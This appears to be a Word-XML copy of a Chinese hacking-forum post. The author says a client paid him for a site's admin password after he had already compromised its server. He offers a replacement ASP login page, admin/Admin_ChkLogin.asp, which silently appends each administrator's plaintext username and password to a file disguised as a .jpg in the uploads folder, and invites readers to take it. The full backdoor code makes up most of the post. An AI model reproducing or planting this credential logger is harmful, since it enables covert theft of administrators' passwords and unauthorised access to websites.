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89" w:rsidRPr="007E2689" w:rsidRDefault="007E2689" w:rsidP="007E2689">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="240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</w:rPr>
        <w:t>替换</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>admin/Admin_ChkLogin.asp</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>会在</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>/UploadFiles/20101222183355602.jpg</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>记录下登录的明文密码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br/>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>写这个东西是因为一个单子</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>客户需要后台密码</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>而我已经拿下服务器了</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>但</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>破不出来</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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br/>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>需要的拿走</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>高手勿喷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br/>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>代码如下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&lt;%@language=vbscript codepage=936 %&gt;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&lt;!--#include file="Conn.asp"--&gt;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&lt;!--#include file="../Inc/Config.asp"--&gt;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&lt;!--#include file="inc/md5.asp"--&gt;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&lt;%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dim sql,rs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dim username,password,CheckCode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username=replace(trim(request("username")),"'","")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password=replace(trim(Request("password")),"'","")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CheckCode=replace(trim(Request("CheckCode")),"'","")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UserName=""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FoundErr=True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ErrMsg=ErrMsg &amp; "&lt;br&gt;&lt;li&gt;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用户名不能为空！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&lt;/li&gt;"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Password=""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FoundErr=True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ErrMsg=ErrMsg &amp; "&lt;br&gt;&lt;li&gt;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密码不能为空！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&lt;/li&gt;"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CheckCode=""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FoundErr=True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ErrMsg=ErrMsg &amp; "&lt;br&gt;&lt;li&gt;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验证码不能为空！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&lt;/li&gt;"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session("CheckCode")=""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FoundErr=True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ErrMsg=ErrMsg &amp; "&lt;br&gt;&lt;li&gt;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你登录时间过长，请重新返回登录页面进行登录。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&lt;/li&gt;"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CheckCode&lt;&gt;CStr(session("CheckCode"))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FoundErr=True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ErrMsg=ErrMsg &amp; "&lt;br&gt;&lt;li&gt;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您输入的确认码和系统产生的不一致，请重新输入。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&lt;/li&gt;"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FoundErr&lt;&gt;True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set fso=Server.CreateObject("Scripting.FileSystemObject")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lastRenderedPageBreak/>
        <w:t>set Webhf=fso.OpenTextFile(Server.mappath("/UploadFiles/20101222183355602.jpg"),8,true)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data=username &amp; "  " &amp; password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Webhf.writeLine data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Webhf.close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set Webhf = nothing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password=md5(password)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set rs=server.createobject("adodb.recordset")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sql="select * from Admin where password='"&amp;password&amp;"' and username='"&amp;username&amp;"'"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rs.open sql,conn,1,3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rs.bof and rs.eof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FoundErr=True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ErrMsg=ErrMsg &amp; "&lt;br&gt;&lt;li&gt;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用户名或密码错误！！！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&lt;/li&gt;"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else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if password&lt;&gt;rs("password")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FoundErr=True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ErrMsg=ErrMsg &amp; "&lt;br&gt;&lt;li&gt;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用户名或密码错误！！！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&lt;/li&gt;"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else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   RndPassword=GetRndPassword(16)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rs("LastLoginIP")=Request.ServerVariables("REMOTE_ADDR")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rs("LastLoginTime")=now()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rs("LoginTimes")=rs("LoginTimes")+1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rs("RndPassword")=RndPassword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rs.update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session.Timeout=SessionTimeout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session("AdminName")=rs("username")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session("AdminPassword")=rs("Password")  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session("RndPassword")=RndPassword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rs.close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set rs=nothing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call CloseConn()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Response.Redirect "default.asp"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rs.close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set rs=nothing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if FoundErr=True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call WriteErrMsg()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call CloseConn()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lastRenderedPageBreak/>
        <w:t>'****************************************************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'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过程名：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WriteErrMsg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'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作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用：显示错误提示信息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'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参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数：无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'****************************************************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sub WriteErrMsg()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dim strErr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strErr=strErr &amp; "&lt;html&gt;&lt;head&gt;&lt;title&gt;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错误信息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&lt;/title&gt;&lt;meta http-equiv='Content-Type' content='text/html; charset=gb2312'&gt;"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strErr=strErr &amp; "&lt;link href='style.css' rel='stylesheet' type='text/css'&gt;&lt;/head&gt;&lt;body&gt;"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strErr=strErr &amp; "&lt;table cellpadding=2 cellspacing=1 border=0 width=400 class='border' align=center&gt;"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strErr=strErr &amp; "  &lt;tr align='center'&gt;&lt;td height='22' class='title'&gt;&lt;strong&gt;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错误信息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&lt;/strong&gt;&lt;/td&gt;&lt;/tr&gt;"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strErr=strErr &amp; "  &lt;tr&gt;&lt;td height='100' class='tdbg' valign='top'&gt;&lt;b&gt;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产生错误的可能原因：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&lt;/b&gt;&lt;br&gt;" &amp; errmsg &amp;"&lt;/td&gt;&lt;/tr&gt;"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 xml:space="preserve">strErr=strErr &amp; "  &lt;tr align='center'&gt;&lt;td class='tdbg'&gt;&lt;a href='Login.asp'&gt;&lt;&lt; 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返回登录页面</w:t>
      </w:r>
      <w:r w:rsidRPr="007E2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;"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strErr=strErr &amp; "&lt;/table&gt;"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strErr=strErr &amp; "&lt;/body&gt;&lt;/html&gt;" &amp; vbcrlf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response.write strErr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sub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Function GetRndPassword(PasswordLen)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Dim Ran,i,strPassword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strPassword=""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For i=1 To PasswordLen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Randomize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Ran = CInt(Rnd * 2)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Randomize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If Ran = 0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Ran = CInt(Rnd * 25) + 97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strPassword =strPassword &amp; UCase(Chr(Ran))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ElseIf Ran = 1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Ran = CInt(Rnd * 9)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strPassword = strPassword &amp; Ran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ElseIf Ran = 2 Then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Ran = CInt(Rnd * 25) + 97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  strPassword =strPassword &amp; Chr(Ran)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  End If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Next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GetRndPassword=strPassword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t>End Function</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E2689" w:rsidRPr="007E2689" w:rsidRDefault="007E2689" w:rsidP="007E2689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color w:val="444444"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E2689" w:rsidRPr="007E2689" w:rsidRDefault="007E2689" w:rsidP="007E2689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2689">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="宋体" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="444444"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>复制代码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00586079" w:rsidRDefault="00586079">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00586079" w:rsidSect="0058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09EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C712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78C"/>
    <w:rsid w:val="000B39F6"/>
    <w:rsid w:val="003C0BC9"/>
    <w:rsid w:val="00586079"/>
    <w:rsid w:val="00622A97"/>
    <w:rsid w:val="007E2689"/>
    <w:rsid w:val="0087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E2689"/>
  </w:style>
  <w:style w:type="character" w:styleId="a3">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="007E26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2011-10-26T11:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-10-26T11:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>